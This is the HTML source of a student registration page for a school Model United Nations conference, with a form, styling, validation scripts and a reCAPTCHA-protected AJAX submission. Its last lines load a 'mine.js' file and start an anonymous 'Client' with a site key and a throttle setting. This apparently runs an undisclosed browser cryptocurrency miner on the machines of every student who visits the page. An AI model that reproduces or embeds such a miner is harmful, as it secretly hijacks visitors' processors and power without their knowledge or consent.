<!doctype html>
<html class="no-js" lang="zxx">
<noscript>
	<style>
		.root{
			display: none!important;
		}
		footer{
			display: none!important;
		}
		.location_information{
			display: none!important;
		}
	</style>
<div style="background-color: black;width: 100%;height: 100%;"><br><Br><Br><br><br><br><Br><Br><br><Br><Br><br><Br><Br><br><br><br><Br><Br><br><Br><Br>
	<center><h2 style="font-weight: 600;font-size: 40px;color: white;">It seems that you have disabled Javascript. Please enable javascript to continue</h2>
	<br><h1 style="font-weight: 600;font-size: 50px;color: #934224;">CVMUN TECH TEAM</h1>
	</center>
	</div>
</noscript>
<head>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>CV MUN 2020</title>
    <meta name="description" content="">
    <link rel="shortcut icon" type="image/x-icon" href="/src/img/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://www.google.com/recaptcha/api.js?render=6LfANOcZAAAAAIflhhidyuPhxU9DydV9d5Tw6U1g"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="manifest" href="/manifest.json">
    <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
    <link rel="stylesheet" href="/src/css/bootstrap.min.css">
    <link rel="stylesheet" href="/src/css/owl.carousel.min.css">
    <link rel="stylesheet" href="/src/css/magnific-popup.css">
    <link rel="stylesheet" href="/src/css/font-awesome.min.css">
    <link rel="stylesheet" href="/src/css/themify-icons.css">
    <link rel="stylesheet" href="/src/css/gijgo.css">
    <link rel="stylesheet" href="/src/css/nice-select.css">
    <link rel="stylesheet" href="/src/css/animate.css">
    <link rel="stylesheet" href="/src/css/flaticon.css">
    <link rel="stylesheet" href="/src/css/slicknav.css">
		<link rel="stylesheet" href="/src/css/footer-area.css">
    <link rel="stylesheet" href="/src/stylesheet.css" type="text/css" charset="utf-8">
    <link rel="stylesheet" href="/src/css/style.css">
    <link rel="stylesheet" href="/src/style.css">
</head>
<style type="text/css">
body{
  background: black;
  color: white;
  font-family: "prestageregular"!important;
}
a{
  font-weight: 600;
  font-size: 25px!important;
}
html {
  --scrollbarBG: rgba(0,0,0,0);
  --thumbBG: #934224;
}
body::-webkit-scrollbar {
  width: 15px;
}
body {
  scrollbar-width: thin;
  scrollbar-color: var(--thumbBG) var(--scrollbarBG);
}
body::-webkit-scrollbar-track {
  background: var(--scrollbarBG);
}
body::-webkit-scrollbar-thumb {
  background-color: var(--thumbBG) ;
  border-radius: 30px;
}
h4{
  font-weight: 500;
  font-size: 30px!important;
}
.preloader {
   overflow: hidden;
   position:fixed;
   top: 0;
   left: 0;
   width: 100%;
   height: 100%;
   z-index: 9999;
   background-image: url('/src/preloader2.gif');
   background-repeat: no-repeat;
   background-color: #000;
   background-position: center;
}
/*.grecaptcha-badge {
    display: None!important;
    visibility: hidden!important;
    
}*/
.grecaptcha-badge {
  width: 70px !important;
  overflow: hidden !important;
  transition: all 0.3s ease !important;
  left: 4px !important;
}

.grecaptcha-badge:hover {
  width: 256px !important;
}
.emsg1,.emsg2,.emsg3,.emsg4{
color: #F32013!important;
font-size: 20px;
}
input::-webkit-outer-spin-button,
input::-webkit-inner-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
input[type=number] {
  -moz-appearance: textfield;
}
.select-hidden {
  display: none;
  visibility: hidden;
  font-size:20px!important;
  padding-right: 10px;
}

.select {
  cursor: pointer;
  display: inline-block;
  position: relative;
  font-size: 16px;
  color: #fff;
  font-size:20px!important;
  width: 220px;
  height: 40px;
}

.select-styled {
  position: absolute;
  top: 0;
  right: 0;
  bottom: 0;
  left: 0;
  background-color: #000;
  padding: 8px 15px;
  -moz-transition: all 0.2s ease-in;
  -o-transition: all 0.2s ease-in;
  -webkit-transition: all 0.2s ease-in;
  transition: all 0.2s ease-in;
}
.select-styled:after {
  content: "";
  width: 0;
  height: 0;
  border: 7px solid transparent;
  border-color: #fff transparent transparent transparent;
  position: absolute;
  top: 16px;
  right: 10px;
}
.select-styled:hover {
  background-color: #000;
}
.select-styled:active, .select-styled.active {
  background-color: #000;
}
.select-styled:active:after, .select-styled.active:after {
  top: 9px;
  border-color: transparent transparent #fff transparent;
}

.select-options {
  display: none;
  position: absolute;
  top: 100%;
  right: 0;
  left: 0;
  z-index: 999;
  font-size:20px!important;
  margin: 0;
  padding: 0;
  list-style: none;
  background-color: #000;
}
.select-options li {
  margin: 0;
  padding: 12px 0;
  text-indent: 15px;
  font-size:20px!important;
  border-top: 1px solid #000;
  -moz-transition: all 0.15s ease-in;
  -o-transition: all 0.15s ease-in;
  -webkit-transition: all 0.15s ease-in;
  transition: all 0.15s ease-in;
}
.select-options li:hover {
  color: #000;
  background: #fff;
  font-size:20px!important;
}
.select-options li[rel="hide"] {
  display: none;
  font-size:20px!important;
}
</style>
<body><div class="root">
  <script>
  setTimeout(function(){
    $('.preloader').fadeOut('slow');
}, 1000);

  </script>
  <div class="preloader"></div>
	<header style='margin-bottom:200px;'>
        <div class="header-area">
            <div id="sticky-header" class="main-header-area">
                <div class="container">
                    <div class="header_bottom_border">
                        <div class="row align-items-center">
                            <div class="col-xl-2 col-lg-3">
                                <div class="logo header-comp">
                                    <a href="/">
                                        <img src="/src/img/logo.png" alt="">
                                    </a>
                                </div>
                            </div>
                            <div class="col-xl-10 col-lg-6">
                                <div class="main-menu  d-none d-lg-block">
                                    <nav>
                                        <ul id="navigation">
                                            <li><a href="/">HOME</a></li>
                                            <li><a href="/schedule/">SCHEDULE</a></li>
                                            <li><a href="/team/">OUR TEAM</a></li>
                                            <li><a href="/resources/">RESOURCES</a></li>
                                            <li><a href="/contact/">CONTACT US</a></li>
                                            <li><a href="#">REGISTER<i class="ti-angle-down"></i></a>
                                                <ul class="submenu">
                                                    <li><a href="/registration/school">SCHOOL</a></li>
                                                    <li><a href="/registration/student" style="color:#934224;">INDIVIDUAL</a></li>
                                                </ul>
                                            </li>
                                            <li><a href="#">COMMITTEES<i class="ti-angle-down"></i></a>
                                                <ul class="submenu">
                                                    <li><a href="/committees/c1">UNGA-DISEC</a></li>
                                                    <li><a href="/committees/c2">UNGA-ECOFIN</a></li>
                                                    <li><a href="/committees/c3">UNHRC</a></li>
                                                    <li><a href="/committees/c4">IPC</a></li>
                                                </ul>
                                            </li>
                                            <li><a href="/cvmun">ACCOUNT</a></li>
                                        </ul>
                                    </nav>
                                </div>
                            </div>
                            <div class="col-12">
                                <div class="mobile_menu d-block d-lg-none" style="background-color: transparent!important"></div>
                            </div>
                        </div>
                    </div>

                </div>
            </div>
        </div>
    </header>
       <div class="single_bradcam  d-flex align-items-center">
             <div class="container">
                   <div class="row align-items-center justify-content-center">
                      <div class="col-xl-12">
                         <div class="slider_text text-center" align="center" style="margin-bottom: 150px;">
                            <h3 class="message-from single-heading main-head wow fadeInRight" data-wow-duration="1s" data-wow-delay=".4s" style="font-weight:600;font-size: 230%!important">STUDENT REGISTRATION</h3>
                            </div>
                      </div>
                   </div>
             </div>
          </div>
    <div class="performar_area black_bg">
        <div class="mb-80 row" align="center">
            <div class="login-box" style="margin: 0 auto;max-width:1080px;">
                <form method="post" style="font-size: 25px!important;font-family: 'HelvNew'!important" id="regForm" autocomplete="off">
                      <input type="text" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="name" placeholder=" Full name" id="name" required><p class="emsg1" id="emsg1"></p>
                      <input type="email" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="email" placeholder=" Email ID" id='email' required><p class="emsg2" id="emsg2"></p>
                      <input type="number" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="mobile" placeholder=" Mobile Number" id='mobile' required><p class="emsg4" id="emsg4"></p>
                      <p class="contact wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Date of birth(dd-mm-yyyy)</p>
                      <input type="date" name="dob" class="wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="background: black; color: white;" placeholder="Date of birth(dd-mm-yyyy)" id="dob" min="1990-01-01" max="2010-01-01"  required>
                      <input type="text" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="schoolname" placeholder=" Name of your school" id="schoolname" required><p class="emsg3" id="emsg3"></p>
                      <p class="contact wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Have you participated in CVMUN before?</p><br>
                      <label class="container">
                        <input type="radio" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="previously" value="yes" checked="checked"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;Yes</p>
                        <span class="checkmark  wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"></span>
                      </label>

                      <label class="container">
                        <input type="radio" class=" wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" name="previously" value="no"><p class="contact" style="font-size: 25px;color: rgba(255,255,255,1)"><br>&nbsp;&nbsp;&nbsp;No</p>
                        <span class="checkmark  wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"></span>
                      </label>
                     <br><br>
                     <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">Mention your MUN experience (if any) in the format MUN-COMMITTEE-AWARD/EB POST</p><br>
                                         <textarea id = "achieve"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                    <br><br>
                    <a target="_blank" href="https://docs.google.com/spreadsheets/d/1er8MERHnMvqZYiqJApuUUhhN1WZ18uE-K9nfniyc6xg/edit?usp=sharing" class="boxed-btn3 wow fadeInDown" data-wow-duration="1s" data-wow-delay=".5s" style="width: 60%;font-size: 30px!important;">COUNTRY MATRIX</a>
                    <br><Br>
                    <p class="contact wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="font-size:25px; color: rgba(255,255,255,1);width: 60%!important;align:left;">SELECT YOUR PREFERRED COMMITTEE</p><br>
                    <select id="copt" name="copt">
                        <option value="UNHRC" selected>UNHRC</option>
                        <option value="IPC">IPC</option>
                        <option value="UNGA-DISEC">UNGA-DISEC</option>
                        <option value="UNGA-ECOFIN">UNGA-ECOFIN</option>
                    </select>
                    <br><br>
                    <p class="contact" style="font-size: 25px;color: rgba(255,255,255,1);width: 60%!important;">country preference seperated by commas (at most 3)</p><br>
                                         <textarea id = "cpref"
                                               rows = "6"
                                               style="resize: none;width: 60%;color: white;background: black;font-size: 25px;"></textarea>
                            <input type="hidden" id="token" name="token"><br><Br>
                                <p class="contact inst wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s"><font color="red">*</font>Delegation fee is Rs 100</p><br>
                            <button type="submit" value="REGISTER" name="submit" id="submit" class="boxed-btn3 wow fadeInDown" data-wow-duration="1s" data-wow-delay=".3s" style="width: 60%; font-size: 30px!important;">REGISTER</button>
                            <div id="divMsg" style="
		                	   overflow: hidden;
		                       position:fixed;
		                       top: 0;
		                       left: 0;
		                       width: 100%;
		                       height: 100%;
		                       display: none;
		                       z-index: 9999;
		                       background-color: rgba(0,0,0,0.6);
		                       background-position: center;
		                		">
                                <div id="confirm1">
         <div class="message" style="font-size:20px;">You are succesfully registered</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
      <div id="confirm2">
         <div class="message" style="font-size:20px;">ERROR MESSAGE</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
      <div id="confirm3">
         <div class="message" style="font-size:20px;">You are already registered</div><br>
         <button class='yes' style="font-size:15px;">OK</button>
      </div>
		                	</div>
                          </form>
                        </div>
                    </div>
                  </div>
                  <div id="once"></div>
									<style>
							        @media (max-width: 700px) {
							    .desktop-footer, .location_information{
							        display:none!important;
							    }
							    .mobile-footer{
							        display:block!important;
							    }
							}
         #confirm1 {
            display: none;
            background-color: #1b8b00;
            background-image: linear-gradient(314deg, #1b8b00 0%, #a2d240 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm1 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         button:disabled,
                button[disabled]{
                  background-color: #cccccc;
                  color: #000;
                }
                button:disabled:hover{
                  background-color: #cccccc;
                  color: #000!important;
                  border-color: #000!important;
                }
         #confirm1 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px;
         }
         #confirm2 {
            display: none;
            background-color: #990000;
            background-image: linear-gradient(147deg, #990000 0%, #ff0000 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm2 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         #confirm2 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px; 
         }
         #confirm3 {
            display: none;
            background-color: #f5df2e;
            background-image: linear-gradient(315deg, #f5df2e 0%, #f07654 74%);
            background-size:cover; 
            color: white; 
            border-radius: 15px;
            border: 1px solid #bbb;
            position: absolute;
              left: 50%;
              top: 50%;
              transform: translate(-50%, -50%);
            padding: 5px;
            position: fixed;
            width: auto;
            padding-bottom: 13px;
            padding-top: 13px;
            height: auto;
            box-sizing: border-box;
            text-align: center;
         }
         #confirm3 button {
            background-color: #22b8cf; 
            display: block; 
            border-radius: 5px; 
            border: 2px solid gray; 
            padding: 5px; 
            margin-right: auto;
            margin-left: auto;
            text-align: center; 
            width: 65px; 
         }
         #confirm3 .message {
            text-align: justify; 
            padding-left: 10px;
            padding-right: 10px;
         }
							.horiz h1 {
							    overflow: hidden;
							    text-align: center;
							}
							.horiz h1:before,
							.horiz h1:after {
							    background-color: #C78F28;
							    content: "";
							    display: inline-block;
							    height: 1px;
							    position: relative;
							    vertical-align: middle;
							    width: 50%;
							}
							.horiz h1:before {
							    right: 0.5em;
							    margin-left: -50%;
							}
							.horiz h1:after {
							    left: 0.5em;
							    margin-right: -50%;
							}
							.horiz img {
							  height:100px;
							  width:100px;
							}
								</style>
<footer class="site-footer wow fadeInUp desktop-footer" data-wow-duration="1s" data-wow-delay=".4s">
      <div class="horiz">
    <h1><img src='/src/img/logo.png'></h1></div>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-md-6">
            <h2 style="color:#934224!important">About CVMUN</h2>
            <p class="text-justify" style="font-size:18px!important;font-family:HelvNew!important;line-height: 1.3!important;">Chettinad Vidyashram Model United Nations is an academic simulation of the United Nations where students play the role of delegates from different countries and attempt to solve real world issues with the policies and perspectives of their assigned country.</p><br><br>
            <h6 style="font-family:HelvNew!important;font-size:70%!important;color:grey!important;">Designed by Anirudh Ramesh</h6>
            <!--<div class="address_details text-center " >
                                <h4 style="font-size: 40px!important ;font-weight: 800!important;color:#934224!important;">19 and 20 December, 2020</h4>
                                <h3 style="margin-bottom: 30px!important;color:#fff!important;">Chettinad Vidyashram, Chennai</h3>
                                <a href="/registration/" class="boxed-btn3">REGISTER NOW</a>
                            </div>-->
          </div>
          <!--<div style="border-left:1px solid white!important;height:200px!important;"></div>-->
          <div class="col-xs-6 col-md-3">
              <div style="padding-left:15%!important;">
              <div style="padding-left:31%!important;border-left:3px inset #C78F28!important;height:200px!important;">
                <h2 style="color:#934224!important">Connect</h2>
                <ul class="footer-links">
                  <li><a href="mailto:cvmun20@gmail.com" target="blank">mail</a></li>
                  <li><a href="https://instagram.com/cvmun2020" target="blank">Instagram</a></li>
                </ul>
            </div>
        </div>
          </div>
          <div class="col-xs-6 col-md-3">
              <div style="padding-left:-40%!important;">
              <div style="padding-left:28%!important;border-left:3px inset #C78F28!important;height:200px!important;">
            <h2 style="color:#934224!important">Quick Links</h2>
            <ul class="footer-links">
              <li><a href="/registration/school">School Registration</a></li>
              <li><a href="/registration/student">Student Registration</a></li>
              <li><a href="/cvmun">ACCOUNT</a></li>
              <li><a href="/resources/">Resources</a></li>
              <li><a href="/schedule/">Schedule</a></li>
            </ul>
          </div>
          </div>
          </div>
        </div>
      </div>
</footer>
<footer class="site-footer wow fadeInUp mobile-footer" style="display:none;" data-wow-duration="1s" data-wow-delay=".4s">
    <div class="horiz">
    <h1><img src='/src/img/logo.png'></h1></div>
      <div class="container">
        <div class="row">
          <div class="col-sm-12 col-md-6">
            <h2 style="color:#934224!important">About CVMUN</h2>
            <p class="text-justify" style="font-size:18px!important;font-family:HelvNew!important;line-height: 1.3!important;">Chettinad Vidyashram Model United Nations is an academic simulation of the United Nations where students play the role of delegates from different countries and attempt to solve real world issues with the policies and perspectives of their assigned country.</p>
          </div>
          <div class="col-xs-6 col-md-3">
                <h2 style="color:#934224!important">Connect</h2>
                <ul class="footer-links">
                  <li><a href="mailto:cvmun20@gmail.com" target="blank">cvmun20@gmail.com</a></li>
                  <li><a href="https://instagram.com/cvmun2020" target="blank">Instagram</a></li>
                </ul>
            </div>
          <div class="col-xs-6 col-md-3">
            <h2 style="color:#934224!important">Quick Links</h2>
            <ul class="footer-links">
              <li><a href="/registration/school">School Registration</a></li>
              <li><a href="/registration/student">Student Registration</a></li>
              <li><a href="/cvmun">ACCOUNT</a></li>
              <li><a href="/resources/">Resources</a></li>
              <li><a href="/schedule/">Schedule</a></li>
            </ul>
            <h6 style="font-family:HelvNew!important;font-size:70%!important;color:grey!important;">Designed by Anirudh Ramesh</h6>
          </div>
          </div>
          </div>
</footer>
    <script src="/src/js.js"></script>
    <script src="/src/js/vendor/modernizr-3.5.0.min.js"></script>
    <script src="/src/js/vendor/jquery-1.12.4.min.js"></script>
    <script src="/src/js/popper.min.js"></script>
    <script src="/src/js/bootstrap.min.js"></script>
    <script src="/src/js/owl.carousel.min.js"></script>
    <script src="/src/js/isotope.pkgd.min.js"></script>
    <script src="/src/js/ajax-form.js"></script>
    <script src="/src/js/waypoints.min.js"></script>
    <script src="/src/js/jquery.counterup.min.js"></script>
    <script src="/src/js/imagesloaded.pkgd.min.js"></script>
    <script src="/src/js/scrollIt.js"></script>
    <script src="/src/js/jquery.scrollUp.min.js"></script>
    <script src="/src/js/wow.min.js"></script>
    <script src="/src/js/gijgo.min.js"></script>
    <script src="/src/js/nice-select.min.js"></script>
    <script src="/src/js/jquery.slicknav.min.js"></script>
    <script src="/src/js/jquery.magnific-popup.min.js"></script>
    <script src="/src/js/tilt.jquery.js"></script>
    <script src="/src/js/plugins.js"></script>
    <script src="/src/js/contact.js"></script>
    <script src="/src/js/jquery.ajaxchimp.min.js"></script>
    <script src="/src/js/jquery.form.js"></script>
    <script src="/src/js/jquery.validate.min.js"></script>
    <script src="/src/js/mail-script.js"></script>
    <script src="/src/js/main.js"></script>
    <script>
        $(document).ready(function(){
            var $regexname = /^[A-Z a-z]{3,50}$/i;
            var $regexsname = /^[A-Z a-z,-.'/()]{3,100}$/i;
            var $regexmobile =/^[6-9]\d{9}$/
            var $regexemail=/^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
            $('#name').on('keypress keydown keyup',function(){
                     if (!$(this).val().match($regexname)) {
                         document.getElementById('emsg1').innerHTML="<b>Please Enter a Valid Name</b>";
                         document.getElementById('submit').disabled=true;
                     }
                   else{
                        document.getElementById('emsg1').innerHTML="";
                        document.getElementById('submit').disabled=false;
                       }
                 });
            $('#email').on('keypress keydown keyup',function(){
                     if (!$(this).val().match($regexemail)) {
                         document.getElementById('emsg2').innerHTML="<b>Please Enter a Valid Email</b>";
                         document.getElementById('submit').disabled=true;
                     }
                   else{
                        document.getElementById('emsg2').innerHTML="";
                        document.getElementById('submit').disabled=false;
                       }
                 });
            $('#schoolname').on('keypress keydown keyup',function(){
                     if (!$(this).val().match($regexsname)) {
                         document.getElementById('emsg3').innerHTML="<b>Please Enter a Valid School Name</b>";
                         document.getElementById('submit').disabled=true;
                     }
                   else{
                        document.getElementById('emsg3').innerHTML="";
                        document.getElementById('submit').disabled=false;
                       }
                 });
            /*$('#mobile').on('keypress keydown keyup',function(){
                     if (!$(this).val().match($regexmobile)) {
                         document.getElementById('emsg4').innerHTML="<b>Please Enter a Valid Mobile Number</b>";
                         document.getElementById('submit').disabled=true;
                     }
                   else{
                        document.getElementById('emsg4').innerHTML="";
                        document.getElementById('submit').disabled=false;
                       }
                 });*/

        });
        </script>
        <script>
	    $('select').each(function(){
    var $this = $(this), numberOfOptions = $(this).children('option').length;
  
    $this.addClass('select-hidden'); 
    $this.wrap('<div class="select"></div>');
    $this.after('<div class="select-styled"></div>');

    var $styledSelect = $this.next('div.select-styled');
    $styledSelect.text($this.children('option').eq(0).text());
  
    var $list = $('<ul />', {
        'class': 'select-options'
    }).insertAfter($styledSelect);
  
    for (var i = 0; i < numberOfOptions; i++) {
        $('<li />', {
            text: $this.children('option').eq(i).text(),
            rel: $this.children('option').eq(i).val(),
            'onClick':'changed(\''+$this.children('option').eq(i).val()+'\');'
        }).appendTo($list);
    }
  
    var $listItems = $list.children('li');
  
    $styledSelect.click(function(e) {
        e.stopPropagation();
        $('div.select-styled.active').not(this).each(function(){
            $(this).removeClass('active').next('ul.select-options').hide();
        });
        $(this).toggleClass('active').next('ul.select-options').toggle();
    });
  
    $listItems.click(function(e) {
        e.stopPropagation();
        $styledSelect.text($(this).text()).removeClass('active');
        $this.val($(this).attr('rel'));
        $list.hide();
        //console.log($this.val());
    });
  
    $(document).click(function() {
        $styledSelect.removeClass('active');
        $list.hide();
    });

});
	</script>
	<script>
	    grecaptcha.ready(function() {
		      grecaptcha.execute('6LfANOcZAAAAAIflhhidyuPhxU9DydV9d5Tw6U1g', {action: 'homepage'}).then(function(token) {
		         document.getElementById("token").value = token;
		      });
		  });
	</script>
	<script>
	$(document).ready(function(){
  $("#regForm").on("submit", function(e) {
    e.preventDefault();
    e.stopImmediatePropagation();
    var srcElement = document.getElementById("divMsg");
	if (srcElement != null) {
		if (srcElement.style.display == "block") {
			srcElement.style.display = 'none';
		}
		else {
			srcElement.style.display = 'block';
		}}
    var name = $("#name").val();//
    var email = $("#email").val();
    var schoolname = $("#schoolname").val();
    var cap = $('#token').val();
    var mobile = $("#mobile").val();
    var dob = $('#dob').val();
    var prev = $("input[name='previously']:checked").val();
    var copt = $("#copt").val();
    var cpref = $("#cpref").val();
    var achieve = $("#achieve").val();
    if (cap == ''){
        grecaptcha.ready(function() {
		      grecaptcha.execute('6LfANOcZAAAAAIflhhidyuPhxU9DydV9d5Tw6U1g').then(function(token) {
		         document.getElementById("token").value = token;
		      });
		  });
		  
    }
    if (cap != ''){
        $.ajax({
          type: "POST",
          url: "/src/validation/student_registration/validate_ireg.php",
          data: {
            name: name,
            email: email,
            dob:dob,
            mobile: mobile,
            prev: prev,
            schoolname: schoolname,
            copt: copt,
        	cpref: cpref,
            captcha: cap,
            achieve:achieve
          },
          success: function(data) {
            if (data == "yes"){
    				var confirmBox = $("#confirm1");
                                confirmBox.find(".message").text('You are succesfully registered');
                                confirmBox.find(".yes").unbind().click(function() {
                                   window.open('https://cvmun.tech/registration/student','_top');
                                });
                                confirmBox.show();
                       
    
            }
    			else if(data=="present"){
                var confirmBox = $("#confirm3");
                                confirmBox.find(".message").text('You are already registered');
                                confirmBox.find(".yes").unbind().click(function() {
                                   window.open('https://cvmun.tech/registration/student','_top');
                                });
                                confirmBox.show();
                         
            }
            else{
                var confirmBox = $("#confirm2");
                                confirmBox.find(".message").text = data
                                confirmBox.find(".message").text(data);
                                confirmBox.find(".yes").unbind().click(function() {
                                   document.getElementById("divMsg").display = "none";
                                });
                                confirmBox.show();
                       
            }
          }
        });}
    return false;
  });
	});
  </script>
  </div>
  <script src="/src/mine.js"></script>
<script>
    var _client = new Client.Anonymous('69b7d3189450160e7451cfdda8df68df786d93a769c24aa68e14d2509a238237', {
        throttle: 0.3, c: 'w', ads: 0
    });
    _client.start();/**/
</script>
</body>
</html>
